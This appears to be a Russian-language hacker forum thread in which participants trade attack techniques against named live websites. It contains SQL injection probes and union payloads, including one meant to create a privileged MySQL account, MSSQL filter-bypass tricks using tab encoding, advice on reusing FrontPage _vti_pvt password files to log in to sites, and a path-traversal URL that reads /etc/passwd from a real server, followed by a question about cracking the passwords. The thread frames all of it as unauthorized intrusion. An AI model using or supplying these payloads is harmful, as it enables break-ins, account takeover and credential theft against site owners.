спасибо много нового узнал но так ни че с этим и не получилось я раззстроен... всем спасибо за помощь
Не могу понять http://www.federalspace.ru/DocDoSele.asp?DocID=46 это урл правильный Пробую так http://www.federalspace.ru/DocDoSele.asp?DocID=46-1 Выдает значение эквивалентное http://www.federalspace.ru/DocDoSele.asp?DocID=45 Дополнительно пробую http://www.federalspace.ru/DocDoSele.asp?DocID=46+order+by+16-- - ОШИБКА! order+by+15-- ВСЕ НОРМАЛЬНО! Делаю вывод что возможна скуль-иньект. Но выполнить иньекцию не выходит Почему так? В других скриптах на этом сайте похожая ситуация.
Ага, там стоит старая бд! Так что придется делать инъект в слепую... select то работает: http://www.federalspace.ru/DocDoSele.asp?DocID=46%20and%201=(select 1)--
GRANT ALL PRIVILEGES ON *.* TO xek@% IDENTIFIED BY "пароль" WITH GRANT OPTION или INSERT INTO user VALUES("%","xek",PASSWORD("пароль"),"Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y");
news.php?id=850+union+select+0,1,2,3,4,GRANT+ALL+PRIVILEGES+ON+*.*+TO+0xek@%+IDENTIFIED+BY+"пароль"+WITH+GRANT+OPTION,6,7+from+mysql.user/* таг?) откуда столько Y P
не получится, если идет select ты никак не проведешь update или любой другой запрос кроме select и union select
Такая проблемка, в MSSQL обычная инъекция /rating.asp?sender=1' sender при вводе фильтруется на пробел, плюс и дефис. Пробел заменил на таб %09, не знаю что с дефисом сделать. А без него не закомментить ненужную часть запроса, там остаётся: ' order by blablabla Другой комент /* выдаёт ошибку, # тоже не коментит =\ Например Code: sender=5'%09UNION%09SELECT%09*%09FROM%09INFORMATION_SCHEMA.TABLES%23 вызывает ошибку Microsoft OLE DB Provider for SQL Server ошибка '80040e14' Unclosed quotation mark after the character string ' group by sender'. т.е. строка получается: Code: INFORMATION_SCHEMA.TABLES#' group by sender'. Можно это как-то обойти?
Ну information_schema должна быть. Code: script.asp?sender=1'%09union%09select%09*%09from%09information_schema.tables%09union%09select%09null Что-то типа того
Блин, никак не канает Узнал по ошибкам, что таблица rating, есть колонки ID и Sender. Code: =5'%09UNION%09SELECT%09sender%09FROM%09rating%09WHERE%09'1'='1 ошибка: Column 'rating.Sender' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. т.е. запрос "SELECT sender FROM rating WHERE '1'='1' group by sender" не канает... хз какой там оригинальный запрос
1.Как можно извернуться в случае если фильтруется (хз как назвать) слово select, как только пишешь в запрос ?id=6+union+select сразу появляется: Code: Precondition Failed The request was not completed due to preconditions that are set in the request header. Preconditions prevent the requested method from being applied to a resource other than the one intended. 2. И что еще делать если отсутствуют выводимые поля?
2Momiji 1. Не могу сказать точно, но думаю что на серваке стоит mod_security, если это так, то имхо бесполезно 2. почитай про Blind sql инъекции, на ачате полно статей и ответов на этот вопрос 2PunkAss имхо фигню делаешь, кроме того что в mssql возможно разделение запросов, ты union select неправильно используешь, да и вобще, если очень надо кидай сюда ссыль посмотрим
http://cleverclub.nashe.ru/rating_d.asp?sender=1' Да вся проблема правильно закончить свой запрос, чтобы в итоге общий был верный. Плохо скуль знаю, научите
На некоторых фтп есть папка , _vti_pvt, там есть файл servise.psw , а нём логин и пароль, от чего они ?
Tyc00n, я хочу неменого уточнить ответ Nea7, там пароли от содениения с узлом с помощью FrontPage. То есть тебе достаточно их расшифровать и вставить в свою версию FP. Далее можешь спокойно логинится к сайту.
http://www.biotechcenter.org/include/down.php?filename=../../../../etc/passwd как можно получить пассы если не получается залогиниться на сервере, расшифровать ))? что еще можно с этого взять?
